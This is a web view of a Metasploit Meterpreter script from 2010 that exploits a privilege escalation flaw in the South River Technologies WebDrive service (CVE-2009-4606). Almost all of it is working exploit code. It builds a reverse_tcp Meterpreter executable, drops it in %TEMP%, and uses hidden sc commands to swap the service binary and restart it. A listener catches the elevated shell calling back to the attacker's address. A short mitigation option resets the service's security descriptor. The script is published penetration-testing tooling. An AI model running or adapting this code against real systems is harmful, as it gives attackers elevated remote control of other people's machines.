Metasploit Framework - /scripts/meterpreter/srt_webdrive_priv.rb - Metasploit Redmine Interface

root / scripts / meterpreter / srt_webdrive_priv.rb

History | View | Annotate | Download (4 KB)

 # $Id: srt_webdrive_priv.rb 8734 2010-03-07 22:49:08Z hdm $
 ##
 # South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
+#
 #  This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
 #  Due to an empty security descriptor, a local attacker can gain elevated privileges.
 #  Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
 #  Vulnerability mitigation featured.
+#
 #  Credit:
 #   - Discovery                                - Nine:Situations:Group::bellick
 #   - Meterpreter script        - Trancer
+#
 #  References:
 #   - http://retrogod.altervista.org/9sg_south_river_priv.html
 #   - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
 #   - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
 #   - http://osvdb.org/show/osvdb/59080
+#
 #  mtrancer[@]gmail.com
 #  http://www.rec-sec.com
 ##
+#
 # Options
+#
 opts = Rex::Parser::Arguments.new(
         "-h"  => [ false,  "This help menu"],
         "-m"  => [ false,  "Mitigate"],
         "-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
         "-p"  => [ true,   "The port on the remote host where Metasploit is listening"]
+)
+#
 # Default parameters
+#
 rhost = Rex::Socket.source_address("1.2.3.4")
 rport = 4444
 sname = 'WebDriveService'
 pname = 'wdService.exe'
+#
 # Option parsing
+#
 opts.parse(args) do |opt, idx, val|
         case opt
         when "-h"
                 print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
                 print_line(opts.usage)
                 raise Rex::Script::Completed
         when "-m"
                 client.sys.process.get_processes().each do |m|
                         if ( m['name'] == pname )
                                 print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
                                 # Set correct service security descriptor to mitigate the vulnerability
                                 print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
                                 client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
                         end
                 end
                 raise Rex::Script::Completed
         when "-r"
                 rhost = val
         when "-p"
                 rport = val.to_i
         end
 end
 client.sys.process.get_processes().each do |m|
         if ( m['name'] == pname )
                 print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
                 # Build out the exe payload.
                 pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
                 pay.datastore['LHOST'] = rhost
                 pay.datastore['LPORT'] = rport
                 raw  = pay.generate
                 exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
                 # Place our newly created exe in %TEMP%
                 tempdir = client.fs.file.expand_path("%TEMP%")
                 tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
                 print_status("Sending EXE payload '#{tempexe}'.")
                 fd = client.fs.file.new(tempexe, "wb")
                 fd.write(exe)
                 fd.close
                 # Stop the vulnerable service
                 print_status("Stopping service \"#{sname}\"...")
                 client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})
                 # Set exe payload as service binpath
                 print_status("Setting \"#{sname}\" to #{tempexe}...")
                 client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
                 sleep(1)
                 # Restart the service
                 print_status("Restarting the \"#{sname}\" service...")
                 client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})
                 # Our handler to recieve the callback.
                 handler = client.framework.exploits.create("multi/handler")
                 handler.datastore['WORKSPACE']      = client.workspace
                 handler.datastore['PAYLOAD']                 = "windows/meterpreter/reverse_tcp"
                 handler.datastore['LHOST']                   = rhost
                 handler.datastore['LPORT']                   = rport
                 handler.datastore['ExitOnSession']         = false
                 handler.exploit_simple(
                         'Payload'        => handler.datastore['PAYLOAD'],
                         'RunAsJob'        => true
+                )
                 # Set service binpath back to normal
                 client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
         end
 end